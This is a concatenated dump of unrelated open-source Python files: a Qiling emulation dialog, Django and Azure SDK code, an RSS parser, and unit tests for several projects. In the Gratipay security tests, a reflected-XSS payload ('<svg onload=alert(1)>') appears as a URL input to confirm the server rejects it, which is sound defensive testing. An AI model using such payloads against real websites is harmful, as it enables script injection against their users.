# with Qiling Framework (the whole file if not selected)
#
# Copyright (c) 2020, <NAME>
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# 1. Redistributions of source code must retain the above copyright notice,
# this list of conditions and the following disclaimer.
# 2. Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS
# IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,
# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR
# CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL,
# EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
# PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS;
# OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,
# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR
# OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF
# ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
import re
import sys
import time
import tkinter
import tkinter.ttk
import tkinter.messagebox
# Print selected items
def get_selection(r, ct, co, ca, ce, ea, t):
print("%s\t%s\t%s\t%s\t%s\t%s" % (ct.get(), co.get(), ca.get().lower(), ce.get(), ea.get(), t.get()), end="")
root.quit()
def combo_arch_selected(r, ca, le, ce):
# Hide / show endian combobox
if ca.get() in ("ARM", "ARM64", "MIPS"):
le.grid()
ce.grid()
else:
ce.current(0)
le.grid_remove()
ce.grid_remove()
def combo_type_selected(r, ct, la, ea):
# Hide / show arguments entry
if ct.get() == "Executable":
la.grid()
ea.grid()
else:
la.grid_remove()
ea.grid_remove()
def timeout_changed(*args):
if not re.match("^-?([0-9])+$", timeout.get()):
timeout.set("60")
elif int(timeout.get()) < 0:
timeout.set("0")
# Create selection dialog
root = tkinter.Tk()
root.title("Emulate code")
root.protocol("WM_DELETE_WINDOW", (lambda r=root: r.quit()))
label_type = tkinter.Label(root, text="File type:")
label_type.grid(row=0, column=0, padx=5, pady=5, sticky="w")
combo_type = tkinter.ttk.Combobox(root, state="readonly")
combo_type["values"] = ("Executable", "Shellcode")
combo_type.current(0)
combo_type.grid(row=0, column=2, padx=5, pady=5, sticky="w")
label_os = tkinter.Label(root, text="OS:")
label_os.grid(row=1, column=0, padx=5, pady=5, sticky="w")
combo_os = tkinter.ttk.Combobox(root, state="readonly")
combo_os["values"] = ("Windows", "Linux") # Currently macOS, UEFI and FreeBSD are excluded
combo_os.current(0)
combo_os.grid(row=1, column=2, padx=5, pady=5, sticky="w")
label_arch = tkinter.Label(root, text="Architecture:")
label_arch.grid(row=2, column=0, padx=5, pady=5, sticky="w")
combo_arch = tkinter.ttk.Combobox(root, state="readonly")
combo_arch["values"] = ("x64", "x86", "ARM", "ARM64", "MIPS")
combo_arch.current(0)
combo_arch.grid(row=2, column=2, padx=5, pady=5, sticky="w")
label_endian = tkinter.Label(root, text="Big endian:")
label_endian.grid(row=3, column=0, padx=5, pady=5, sticky="w")
label_endian.grid_remove()
combo_endian = tkinter.ttk.Combobox(root, state="readonly")
combo_endian["values"] = ("False", "True")
combo_endian.current(0)
combo_endian.grid(row=3, column=2, padx=5, pady=5, sticky="w")
combo_endian.grid_remove()
label_args = tkinter.Label(root, text="Command line arguments:")
label_args.grid(row=4, column=0, padx=5, pady=5, sticky="w")
entry_args = tkinter.Entry(width=24)
entry_args.grid(row=4, column=2, padx=5, pady=5, sticky="w")
label_timeout = tkinter.Label(root, text="Emulation timeout\n(seconds, 0 = no timeout):", justify="left")
label_timeout.grid(row=5, column=0, padx=5, pady=5, sticky="w")
timeout = tkinter.StringVar()
timeout.set("60")
timeout.trace("w", timeout_changed)
spin_timeout = tkinter.Spinbox(root, textvariable=timeout, width=4, from_=0, to=10000)
spin_timeout.grid(row=5, column=2, padx=5, pady=5, sticky="w")
button = tkinter.Button(root, text="OK", command=(lambda r=root, ct=combo_type, co=combo_os, ca=combo_arch, ce=combo_endian, ea=entry_args, t=timeout: get_selection(r, ct, co, ca, ce, ea, t)))
button.grid(row=6, column=0, padx=5, pady=5, columnspan=3)
button.focus() # Focus to this widget
# Set callback functions
combo_arch.bind('<<ComboboxSelected>>', lambda event, r=root, ca=combo_arch, le=label_endian, ce=combo_endian: combo_arch_selected(r, ca, le, ce))
combo_type.bind('<<ComboboxSelected>>', lambda event, r=root, ct=combo_type, la=label_args, ea=entry_args: combo_type_selected(r, ct, la, ea))
for x in (combo_type, combo_os, combo_arch, combo_endian, entry_args, spin_timeout, button):
x.bind("<Return>", lambda event, r=root, ct=combo_type, co=combo_os, ca=combo_arch, ce=combo_endian, ea=entry_args, t=timeout: get_selection(r, ct, co, ca, ce, ea, t))
# Adjust window position
sw = root.winfo_screenwidth()
sh = root.winfo_screenheight()
root.update_idletasks() # Necessary to get width and height of the window
ww = root.winfo_width()
wh = root.winfo_height()
root.geometry('+%d+%d' % ((sw/2) - (ww/2), (sh/2) - (wh/2)))
root.mainloop()
|
tests/unit/commands/status_test.py | gamechanger/dusty | 421 | 12635796 | from mock import patch, Mock, call
from ...testcases import DustyTestCase
from dusty.commands.status import _has_active_container, get_dusty_status
from dusty.schemas.base_schema_class import DustySchema
from ..utils import get_app_dusty_schema, get_bundle_dusty_schema, get_lib_dusty_schema
class TestStatusCommands(DustyTestCase):
@patch('dusty.commands.status.get_dusty_containers')
def test_has_active_container_lib_active(self, fake_get_dusty_containers):
fake_get_dusty_containers.return_value = ['some_container']
self.assertEquals(False, _has_active_container('lib', 'lib-a'))
@patch('dusty.commands.status.get_dusty_containers')
def test_has_active_container_lib_inactive(self, fake_get_dusty_containers):
fake_get_dusty_containers.return_value = []
self.assertEquals(False, _has_active_container('lib', 'lib-a'))
@patch('dusty.commands.status.get_dusty_containers')
def test_has_active_container_app_active(self, fake_get_dusty_containers):
fake_get_dusty_containers.return_value = ['some_container']
self.assertEquals(True, _has_active_container('app', 'app-a'))
@patch('dusty.commands.status.get_dusty_containers')
def test_has_active_container_app_inactive(self, fake_get_dusty_containers):
fake_get_dusty_containers.return_value = []
self.assertEquals(False, _has_active_container('app', 'app-a'))
@patch('dusty.commands.status.get_dusty_containers')
def test_has_active_container_service_active(self, fake_get_dusty_containers):
fake_get_dusty_containers.return_value = ['some_container']
self.assertEquals(True, _has_active_container('service', 'service-a'))
@patch('dusty.commands.status.get_dusty_containers')
def test_has_active_container_service_inactive(self, fake_get_dusty_containers):
fake_get_dusty_containers.return_value = []
self.assertEquals(False, _has_active_container('service', 'service-a'))
@patch('dusty.commands.status.docker_vm_is_running')
@patch('dusty.systems.docker.get_docker_client')
@patch('dusty.commands.status.PrettyTable')
@patch('dusty.commands.status.get_dusty_containers')
@patch('dusty.schemas.base_schema_class.get_specs_from_path')
@patch('dusty.compiler.spec_assembler._get_referenced_apps')
@patch('dusty.compiler.spec_assembler._get_referenced_libs')
@patch('dusty.compiler.spec_assembler._get_referenced_services')
def test_get_dusty_status_active_1(self, fake_get_services, fake_get_libs, fake_get_apps, fake_get_specs,
fake_get_dusty_containers, fake_pretty_table, fake_get_docker_client, fake_vm_is_running):
fake_get_services.return_value = set(['ser1', 'ser2', 'ser3'])
fake_get_libs.return_value = set(['lib1'])
fake_get_apps.return_value = set(['app1', 'app2'])
fake_table = Mock()
fake_pretty_table.return_value = fake_table
fake_get_dusty_containers.return_value = ['some_container']
fake_get_specs.return_value = {'apps': {'app1': get_app_dusty_schema({}, 'app1'), 'app2':get_app_dusty_schema({}, 'app2')},
'libs': {'lib1': get_lib_dusty_schema({}, 'lib1')},
'services': {'ser1': DustySchema(None, {}, 'ser1', 'services'), 'ser2': DustySchema(None, {}, 'ser2', 'services'), 'ser3': DustySchema(None, {}, 'ser3', 'services')},
'bundles': get_lib_dusty_schema({}, 'bundle')}
fake_get_docker_client.return_value = None
fake_vm_is_running.return_value = True
get_dusty_status()
call_args_list = fake_table.add_row.call_args_list
self.assertTrue(call(['app1', 'app', 'X']) in call_args_list)
self.assertTrue(call(['app2', 'app', 'X']) in call_args_list)
self.assertTrue(call(['lib1', 'lib', '']) in call_args_list)
self.assertTrue(call(['ser1', 'service', 'X']) in call_args_list)
self.assertTrue(call(['ser2', 'service', 'X']) in call_args_list)
self.assertTrue(call(['ser3', 'service', 'X']) in call_args_list)
self.assertTrue(call(['dustyInternalNginx', '', 'X']) in call_args_list)
self.assertEquals(len(call_args_list), 7)
@patch('dusty.commands.status.docker_vm_is_running')
@patch('dusty.systems.docker.get_docker_client')
@patch('dusty.commands.status.PrettyTable')
@patch('dusty.commands.status.get_dusty_containers')
@patch('dusty.schemas.base_schema_class.get_specs_from_path')
@patch('dusty.compiler.spec_assembler._get_referenced_apps')
@patch('dusty.compiler.spec_assembler._get_referenced_libs')
@patch('dusty.compiler.spec_assembler._get_referenced_services')
def test_get_dusty_status_active_2(self, fake_get_services, fake_get_libs, fake_get_apps, fake_get_specs,
fake_get_dusty_containers, fake_pretty_table, fake_get_docker_client, fake_vm_is_running):
fake_get_services.return_value = set(['ser1', 'ser2', 'ser3'])
fake_get_libs.return_value = set(['lib1'])
fake_get_apps.return_value = set(['app1', 'app2'])
fake_table = Mock()
fake_pretty_table.return_value = fake_table
fake_get_dusty_containers.return_value = []
fake_get_specs.return_value = {'apps': {'app1': get_app_dusty_schema({}, 'app1'), 'app2':get_app_dusty_schema({}, 'app2')},
'libs': {'lib1': get_lib_dusty_schema({}, 'lib1')},
'services': {'ser1': DustySchema(None, {}, 'ser1', 'services'), 'ser2': DustySchema(None, {}, 'ser2', 'services'), 'ser3': DustySchema(None, {}, 'ser3', 'services')},
'bundles': get_lib_dusty_schema({}, 'bundle')}
fake_get_docker_client.return_value = None
fake_vm_is_running.return_value = True
get_dusty_status()
call_args_list = fake_table.add_row.call_args_list
self.assertTrue(call(['app1', 'app', '']) in call_args_list)
self.assertTrue(call(['app2', 'app', '']) in call_args_list)
self.assertTrue(call(['lib1', 'lib', '']) in call_args_list)
self.assertTrue(call(['ser1', 'service', '']) in call_args_list)
self.assertTrue(call(['ser2', 'service', '']) in call_args_list)
self.assertTrue(call(['ser3', 'service', '']) in call_args_list)
self.assertTrue(call(['dustyInternalNginx', '', '']) in call_args_list)
self.assertEquals(len(call_args_list), 7)
|
corehq/ex-submodules/casexml/apps/phone/tests/test_sync_purge.py | omari-funzone/commcare-hq | 471 | 12635805 | <filename>corehq/ex-submodules/casexml/apps/phone/tests/test_sync_purge.py
import uuid
from django.test import TestCase
from testil import eq
from casexml.apps.case.xml import V1
from casexml.apps.phone.exceptions import MissingSyncLog
from casexml.apps.phone.models import get_alt_device_id
from casexml.apps.phone.tests.utils import create_restore_user
from casexml.apps.phone.utils import MockDevice
from corehq.apps.app_manager.models import Application
from corehq.apps.domain.models import Domain
from corehq.apps.receiverwrapper.util import submit_form_locally
from corehq.form_processor.tests.utils import FormProcessorTestUtils
from corehq.form_processor.utils import get_simple_form_xml
class TestSyncPurge(TestCase):
@classmethod
def setUpClass(cls):
super(TestSyncPurge, cls).setUpClass()
cls.domain = uuid.uuid4().hex
cls.project = Domain(name=cls.domain)
cls.project.save()
cls.restore_user = create_restore_user(domain=cls.domain)
cls.app = Application(domain=cls.domain)
cls.app.save()
@classmethod
def tearDownClass(cls):
FormProcessorTestUtils.delete_all_xforms(cls.domain)
FormProcessorTestUtils.delete_all_sync_logs()
cls.project.delete()
super(TestSyncPurge, cls).tearDownClass()
def test_prune_synclogs(self):
device = MockDevice(self.project, self.restore_user)
initial_sync = device.sync(items=True, version=V1, app=self.app)
initial_synclog_id = initial_sync.restore_id
self.assertIsNone(initial_sync.get_log().previous_log_id)
# form submission success when there is no previous sync log
form_xml = get_simple_form_xml(uuid.uuid4().hex)
submit_form_locally(form_xml, self.domain, last_sync_token=initial_synclog_id)
# more syncs
second_sync = device.sync(version=V1, app=self.app)
third_sync = device.sync(version=V1, app=self.app)
# form submission should remove all previous syncs
form_xml = get_simple_form_xml(uuid.uuid4().hex)
submit_form_locally(form_xml, self.domain, last_sync_token=third_sync.restore_id)
third_synclog = third_sync.get_log() # re-fetch
self.assertIsNone(third_synclog.previous_log_id)
with self.assertRaises(MissingSyncLog):
initial_sync.get_log()
with self.assertRaises(MissingSyncLog):
second_sync.get_log()
# form submissions after purge don't fail
form_xml = get_simple_form_xml(uuid.uuid4().hex)
submit_form_locally(form_xml, self.domain, last_sync_token=third_sync.restore_id)
# restores after purge don't fail
fourth_sync = device.sync(version=V1, app=self.app)
response = fourth_sync.config.get_response()
self.assertEqual(response.status_code, 200)
def test_prune_formplayer_synclogs(self):
device = MockDevice(self.project, self.restore_user)
device.id = 'WebAppsLogin-' + device.id
first_sync = device.sync()
second_sync = device.sync()
third_sync = device.sync()
device2 = MockDevice(self.project, self.restore_user)
device2.id = 'WebAppsLogin-' + device2.id
other_sync = device2.sync()
form_xml = get_simple_form_xml(uuid.uuid4().hex)
submit_form_locally(form_xml, self.domain, last_sync_token=third_sync.restore_id)
self.assertIsNone(third_sync.get_log().previous_log_id)
with self.assertRaises(MissingSyncLog):
first_sync.get_log()
with self.assertRaises(MissingSyncLog):
second_sync.get_log()
# Other sync for same user but with different device ID is still there
self.assertIsNotNone(other_sync.get_log())
# form submissions after purge don't fail
form_xml = get_simple_form_xml(uuid.uuid4().hex)
submit_form_locally(form_xml, self.domain, last_sync_token=third_sync.restore_id)
# restores after purge don't fail
fourth_sync = device.sync()
response = fourth_sync.config.get_response()
self.assertEqual(response.status_code, 200)
def test_get_alt_device_id():
eq(get_alt_device_id('WebAppsLogin*<EMAIL>*as*example.mr.snuggles'),
'WebAppsLogin*<EMAIL>*as*example.mr.snuggles')
|
Scripts/Bots/runPython_bot/start.py | ShivangiPatel102/Python_and_the_Web | 437 | 12635815 | from bot import run_python_bot
import logging
from pytz import timezone
from datetime import datetime
TIMEZONE = "Asia/Kolkata"
logging.Formatter.converter = lambda *args: datetime.now(
tz=timezone(TIMEZONE)
).timetuple()
logging.basicConfig(
format="%(asctime)s - %(name)s - %(levelname)s - %(message)s",
level=logging.INFO,
datefmt="%d/%m/%Y %I:%M:%S %p",
)
logger = logging.getLogger()
logger.setLevel(20)
run_python_bot.bot()
|
WebMirror/management/rss_parser_funcs/feed_parse_extractTandQ.py | fake-name/ReadableWebProxy | 193 | 12635827 | def extractTandQ(item):
"""
T&Q
"""
vol, chp, frag, postfix = extractVolChapterFragmentPostfix(item['title'])
if not (chp or vol or frag) or 'preview' in item['title'].lower():
return None
bad = [
'#K-drama',
'fashion',
'C-Drama',
'#Trending',
'Feature',
'#Trailer',
'#Eng Sub',
'Movies',
'Status Updates/Post Tallies',
'Learn Chinese',
'Short Stories',
]
if any([(tmp in item['tags']) for tmp in bad]):
return None
tagmap = [
('Three Kingdoms Online Overlord', 'Three Kingdoms Online Overlord', 'translated'),
('Three Kingdoms Online Overlord | 网游之三国超级领主', 'Three Kingdoms Online Overlord', 'translated'),
('Perfect Fiance', 'Perfect Fiancé', 'translated'),
('Perfect Fiancé | 完美未婚夫', 'Perfect Fiancé', 'translated'),
('Ten Years are not that Far', 'Ten Years are not that Far', 'translated'),
('#Les Interpretes', 'Les Interpretes', 'translated'),
('致我们终将逝去的青春', 'To Our Youth That is Fading Away', 'translated'),
('So Young | 致我们终将逝去的青春', 'To Our Youth That is Fading Away', 'translated'),
("Fleeting Midsummer (Beijing University's Weakest Student)", "Fleeting Midsummer (Beijing University's Weakest Student)", 'translated'),
("Fleeting Midsummer (Peking University's Weakest Student)", "Fleeting Midsummer (Peking University's Weakest Student)", 'translated'),
("Fleeting Midsummer (Peking University's Weakest Student)| 北大差生·", "Fleeting Midsummer (Peking University's Weakest Student)", 'translated'),
("Fleeting Midsummer (Peking University's Weakest Student)| 北大差生", "Fleeting Midsummer (Peking University's Weakest Student)", 'translated'),
('When A Snail Falls in Love| 如果蜗牛有爱情', 'When A Snail Falls in Love', 'translated'),
('The Rebirth of an Ill-Fated Consort | 重生之嫡女祸妃', 'The Rebirth of an Ill-Fated Consort', 'translated'),
('Siege in Fog | 迷雾围城', 'Siege in Fog', 'translated'),
('Pristine Darkness | 他来了请闭眼之暗粼', 'Pristine Darkness', 'translated'),
('Les Interpretes | 亲爱的翻译官', 'Les Interpretes', 'translated'),
('Les Interpretes | 情爱的翻译官', 'Les Interpretes', 'translated'),
('The Daily Record of Secretly Loving the Male Idol|男神暗恋日记', 'The Daily Record of Secretly Loving the Male Idol', 'translated'),
('Master Devil Don\'t Kiss Me', 'Master Devil Don\'t Kiss Me', 'translated'),
('Master Devil Don\'t Kiss Me! | 恶魔少爷别吻我', 'Master Devil Don\'t Kiss Me', 'translated'),
]
for tagname, name, tl_type in tagmap:
if tagname in item['tags']:
return buildReleaseMessageWithType(item, name, vol, chp, frag=frag, postfix=postfix, tl_type=tl_type)
return False |
tests/py/test_security.py | kant/gratipay.com | 517 | 12635845 | from __future__ import absolute_import, division, print_function, unicode_literals
import struct
import datetime
from aspen import Response
from aspen.http.request import Request
from base64 import urlsafe_b64decode
from cryptography.fernet import Fernet, InvalidToken
from gratipay import security
from gratipay.models.participant import Identity
from gratipay.security.crypto import EncryptingPacker
from gratipay.testing import Harness
from pytest import raises
class RejectNullBytesInURI(Harness):
def test_filters_path(self):
assert self.client.GxT('/f%00/').code == 400
def test_filters_querystring(self):
assert self.client.GxT('/', QUERY_STRING='f%00=bar').code == 400
def test_protects_against_reflected_xss(self):
self.make_package()
assert self.client.GET('/on/npm/foo').code == 200
assert self.client.GxT('/on/npm/foo%00<svg onload=alert(1)>').code == 400
assert self.client.GxT('/on/npm/foo%01<svg onload=alert(1)>').code == 404 # fyi
class OnlyAllowCertainMethodsTests(Harness):
def test_is_installed_properly(self):
assert self.client.hxt('TRaCE', '/').code == 405
def test_allows_certain_methods(self):
for allowed in ('GEt', 'HEaD', 'PosT'):
request = Request(allowed)
assert security.only_allow_certain_methods(request) is None
def test_disallows_a_bunch_of_other_stuff(self):
for disallowed in ('OPTIONS', 'TRACE', 'TRACK', 'PUT', 'DELETE'):
request = Request(disallowed)
response = raises(Response, security.only_allow_certain_methods, request).value
assert response.code == 405
def test_doesnt_choke_error_handling(self):
assert self.client.hit("OPTIONS", "/", raise_immediately=False).code == 405
def test_prevents_csrf_from_choking(self):
assert self.client.PxST('/assets/gratipay.css').code == 405
class AddHeadersToResponseTests(Harness):
def test_sets_x_frame_options(self):
headers = self.client.GET('/about/').headers
assert headers['X-Frame-Options'] == 'SAMEORIGIN'
def test_sets_x_content_type_options(self):
headers = self.client.GET('/about/').headers
assert headers['X-Content-Type-Options'] == 'nosniff'
def test_sets_x_xss_protection(self):
headers = self.client.GET('/about/').headers
assert headers['X-XSS-Protection'] == '1; mode=block'
def test_sets_referrer_policy(self):
headers = self.client.GET('/about/').headers
assert headers['Referrer-Policy'] == \
'no-referrer-when-downgrade, strict-origin-when-cross-origin'
def test_sets_strict_transport_security(self):
headers = self.client.GET('/about/').headers
assert headers['strict-transport-security'] == 'max-age=31536000'
def test_doesnt_set_content_security_policy_by_default(self):
assert 'content-security-policy-report-only' not in self.client.GET('/about/').headers
def test_sets_content_security_policy(self):
with self.setenv(CSP_REPORT_URI='http://cheese/'):
headers = self.client.GET('/about/').headers
policy = (
"default-src 'self';"
"script-src 'self' assets.gratipay.com 'unsafe-inline';"
"style-src 'self' assets.gratipay.com downloads.gratipay.com cloud.typography.com"
" 'sha256-WLocK7HeCKzQLS0M+PGS++5IhyfFsOA5N4ZCeTcltoo=';"
"img-src *;"
"font-src 'self' assets.gratipay.com cloud.typography.com data:;"
"block-all-mixed-content;"
"report-uri http://cheese/;"
)
assert headers['content-security-policy-report-only'] == policy
class EncryptingPackerTests(Harness):
packed = b'gAAAAABXJMbdriJ984uMCMKfQ5p2UUNHB1vG43K_uJyzUffbu2Uwy0d71kAnqOKJ7Ww_FEQz9Dliw87UpM'\
b'5TdyoJsll5nMAicg=='
def test_packs_encryptingly(self):
packed = Identity.encrypting_packer.pack({"foo": "bar"})
assert urlsafe_b64decode(packed)[0] == b'\x80' # Fernet version
def test_unpacks_decryptingly(self):
assert Identity.encrypting_packer.unpack(self.packed) == {"foo": "bar"}
def test_fails_to_unpack_old_data_with_a_new_key(self):
encrypting_packer = EncryptingPacker(Fernet.generate_key())
raises(InvalidToken, encrypting_packer.unpack, self.packed)
def test_can_unpack_if_old_key_is_provided(self):
old_key = str(self.client.website.env.crypto_keys)
encrypting_packer = EncryptingPacker(Fernet.generate_key(), old_key)
assert encrypting_packer.unpack(self.packed) == {"foo": "bar"}
def test_leaks_timestamp_derp(self):
# https://github.com/pyca/cryptography/issues/2714
timestamp, = struct.unpack(">Q", urlsafe_b64decode(self.packed)[1:9]) # unencrypted!
assert datetime.datetime.fromtimestamp(timestamp).year == 2016
def test_demands_bytes(self):
raises(TypeError, Identity.encrypting_packer.unpack, buffer('buffer'))
raises(TypeError, Identity.encrypting_packer.unpack, 'unicode')
|
mailchimp3/entities/listsignupforms.py | michaelwalkerfl/python-mailchimp | 311 | 12635848 | # coding=utf-8
"""
The List Signup Forms API endpoint
Documentation: http://developer.mailchimp.com/documentation/mailchimp/reference/lists/signup-forms/
Schema: https://api.mailchimp.com/schema/3.0/Lists/SignupForms/Instance.json
"""
from __future__ import unicode_literals
from mailchimp3.baseapi import BaseApi
class ListSignupForms(BaseApi):
"""
Manage list signup forms.
"""
def __init__(self, *args, **kwargs):
"""
Initialize the endpoint
"""
super(ListSignupForms, self).__init__(*args, **kwargs)
self.endpoint = 'lists'
self.list_id = None
def create(self, list_id, data):
"""
Create a customized list signup form.
No fields are listed as required in the documentation and the
description of the method does not indicate any required fields
either.
:param list_id: The unique id for the list.
:type list_id: :py:class:`str`
:param data: The request body parameters
:type data: :py:class:`dict`
"""
self.list_id = list_id
response = self._mc_client._post(url=self._build_path(list_id, 'signup-forms'), data=data)
return response
def all(self, list_id):
"""
Get signup forms for a specific list.
:param list_id: The unique id for the list.
:type list_id: :py:class:`str`
"""
self.list_id = list_id
return self._mc_client._get(url=self._build_path(list_id, 'signup-forms'))
|
apps/base/models.py | kaustubh-s1/EvalAI | 1,470 | 12635852 | from __future__ import unicode_literals
import logging
from django.db import models
# Get an instance of a logger
logger = logging.getLogger(__name__)
class TimeStampedModel(models.Model):
"""
An abstract base class model that provides self-managed `created_at` and
`modified_at` fields.
"""
created_at = models.DateTimeField(auto_now_add=True)
modified_at = models.DateTimeField(auto_now=True)
class Meta:
abstract = True
app_label = "base"
def model_field_name(field_name, *args, **kwargs):
"""
The decorator is used to pass model field names to create_post_model_field function for logging change.
"""
def model_field_name_decorator(f, *args, **kwargs):
def model_field_name_wrapper(sender, instance, **kwargs):
f(sender, instance, field_name=field_name, **kwargs)
return model_field_name_wrapper
return model_field_name_decorator
|
venv/lib/python3.7/site-packages/allauth/socialaccount/providers/vimeo_oauth2/urls.py | vikram0207/django-rest | 6,342 | 12635891 | """URLs for Patreon Provider"""
from allauth.socialaccount.providers.oauth2.urls import default_urlpatterns
from .provider import VimeoOAuth2Provider
urlpatterns = default_urlpatterns(VimeoOAuth2Provider)
|
sdk/formrecognizer/azure-ai-formrecognizer/tests/test_to_dict_v2.py | vincenttran-msft/azure-sdk-for-python | 2,728 | 12635913 | # coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
# --------------------------------------------------------------------------
from datetime import datetime
from azure.ai.formrecognizer import _models
from testcase import FormRecognizerTest
class TestToDict(FormRecognizerTest):
def test_point_to_dict(self):
model = [_models.Point(1, 2), _models.Point(3, 4)]
d = [p.to_dict() for p in model]
final = [
{"x": 1, "y": 2},
{
"x": 3,
"y": 4,
},
]
assert d == final
def test_form_word_to_dict(self):
form_word = _models.FormWord(
text="word",
confidence=0.92,
page_number=1,
bounding_box=[
_models.Point(1427.0, 1669.0),
_models.Point(1527.0, 1669.0),
_models.Point(1527.0, 1698.0),
_models.Point(1427.0, 1698.0),
],
)
d = form_word.to_dict()
final = {
"text": "word",
"bounding_box": [
{"x": 1427.0, "y": 1669.0},
{"x": 1527.0, "y": 1669.0},
{"x": 1527.0, "y": 1698.0},
{"x": 1427.0, "y": 1698.0},
],
"confidence": 0.92,
"page_number": 1,
"kind": "word",
}
assert d == final
def test_form_line_to_dict(self):
form_line = _models.FormLine(
text="sample line",
bounding_box=[
_models.Point(1427.0, 1669.0),
_models.Point(1527.0, 1669.0),
_models.Point(1527.0, 1698.0),
_models.Point(1427.0, 1698.0),
],
words=[
_models.FormWord(
text="sample",
confidence=0.92,
page_number=1,
bounding_box=[
_models.Point(1427.0, 1669.0),
_models.Point(1527.0, 1669.0),
_models.Point(1527.0, 1698.0),
_models.Point(1427.0, 1698.0),
],
),
_models.FormWord(
text="line",
confidence=0.92,
page_number=1,
bounding_box=[
_models.Point(1427.0, 1669.0),
_models.Point(1527.0, 1669.0),
_models.Point(1527.0, 1698.0),
_models.Point(1427.0, 1698.0),
],
),
],
page_number=2,
appearance=_models.TextAppearance(
style_name="other", style_confidence=0.90
),
)
d = form_line.to_dict()
final = {
"text": "sample line",
"bounding_box": [
{"x": 1427.0, "y": 1669.0},
{"x": 1527.0, "y": 1669.0},
{"x": 1527.0, "y": 1698.0},
{"x": 1427.0, "y": 1698.0},
],
"words": [
{
"text": "sample",
"bounding_box": [
{"x": 1427.0, "y": 1669.0},
{"x": 1527.0, "y": 1669.0},
{"x": 1527.0, "y": 1698.0},
{"x": 1427.0, "y": 1698.0},
],
"confidence": 0.92,
"page_number": 1,
"kind": "word",
},
{
"text": "line",
"bounding_box": [
{"x": 1427.0, "y": 1669.0},
{"x": 1527.0, "y": 1669.0},
{"x": 1527.0, "y": 1698.0},
{"x": 1427.0, "y": 1698.0},
],
"confidence": 0.92,
"page_number": 1,
"kind": "word",
},
],
"page_number": 2,
"kind": "line",
"appearance": {"style_name": "other", "style_confidence": 0.90},
}
assert d == final
def test_form_selection_mark_to_dict(self):
form_selection_mark = _models.FormSelectionMark(
text="checkbox",
state="selected",
confidence=0.92,
page_number=1,
bounding_box=[
_models.Point(1427.0, 1669.0),
_models.Point(1527.0, 1669.0),
_models.Point(1527.0, 1698.0),
_models.Point(1427.0, 1698.0),
],
)
d = form_selection_mark.to_dict()
final = {
"text": "checkbox",
"state": "selected",
"bounding_box": [
{"x": 1427.0, "y": 1669.0},
{"x": 1527.0, "y": 1669.0},
{"x": 1527.0, "y": 1698.0},
{"x": 1427.0, "y": 1698.0},
],
"confidence": 0.92,
"page_number": 1,
"kind": "selectionMark",
}
assert d == final
def test_form_element_to_dict(self):
form_element = _models.FormElement(
kind="selectionMark",
text="element",
page_number=1,
bounding_box=[
_models.Point(1427.0, 1669.0),
_models.Point(1527.0, 1669.0),
_models.Point(1527.0, 1698.0),
_models.Point(1427.0, 1698.0),
],
)
d = form_element.to_dict()
final = {
"text": "element",
"bounding_box": [
{"x": 1427.0, "y": 1669.0},
{"x": 1527.0, "y": 1669.0},
{"x": 1527.0, "y": 1698.0},
{"x": 1427.0, "y": 1698.0},
],
"page_number": 1,
"kind": "selectionMark",
}
assert d == final
def test_text_appearance_to_dict(self):
model = _models.TextAppearance(
style_name="other", style_confidence=0.98
)
d = model.to_dict()
final = {"style_name": "other", "style_confidence": 0.98}
assert d == final
def test_field_data_to_dict(self):
model = _models.FieldData(
text="element",
page_number=1,
bounding_box=[
_models.Point(1427.0, 1669.0),
_models.Point(1527.0, 1669.0),
_models.Point(1527.0, 1698.0),
_models.Point(1427.0, 1698.0),
],
field_elements=[
_models.FormWord(
text="word",
confidence=0.92,
page_number=1,
bounding_box=[
_models.Point(1427.0, 1669.0),
_models.Point(1527.0, 1669.0),
_models.Point(1527.0, 1698.0),
_models.Point(1427.0, 1698.0),
],
),
],
)
d = model.to_dict()
final = {
"text": "element",
"bounding_box": [
{"x": 1427.0, "y": 1669.0},
{"x": 1527.0, "y": 1669.0},
{"x": 1527.0, "y": 1698.0},
{"x": 1427.0, "y": 1698.0},
],
"page_number": 1,
"field_elements": [
{
"text": "word",
"bounding_box": [
{"x": 1427.0, "y": 1669.0},
{"x": 1527.0, "y": 1669.0},
{"x": 1527.0, "y": 1698.0},
{"x": 1427.0, "y": 1698.0},
],
"confidence": 0.92,
"page_number": 1,
"kind": "word",
}
],
}
assert d == final
def test_form_field_to_dict(self):
form_field = _models.FormField(
value_type="phoneNumber",
label_data=_models.FieldData(
text="phone",
page_number=1,
bounding_box=[
_models.Point(1427.0, 1669.0),
_models.Point(1527.0, 1669.0),
_models.Point(1527.0, 1698.0),
_models.Point(1427.0, 1698.0),
],
),
value_data=_models.FieldData(
text="55554444",
page_number=1,
bounding_box=[
_models.Point(1427.0, 1669.0),
_models.Point(1527.0, 1669.0),
_models.Point(1527.0, 1698.0),
_models.Point(1427.0, 1698.0),
],
),
name="phone",
value="55554444",
confidence=0.99,
)
d = form_field.to_dict()
final = {
"value_type": "phoneNumber",
"label_data": {
"text": "phone",
"bounding_box": [
{"x": 1427.0, "y": 1669.0},
{"x": 1527.0, "y": 1669.0},
{"x": 1527.0, "y": 1698.0},
{"x": 1427.0, "y": 1698.0},
],
"page_number": 1,
"field_elements": []
},
"value_data": {
"text": "55554444",
"bounding_box": [
{"x": 1427.0, "y": 1669.0},
{"x": 1527.0, "y": 1669.0},
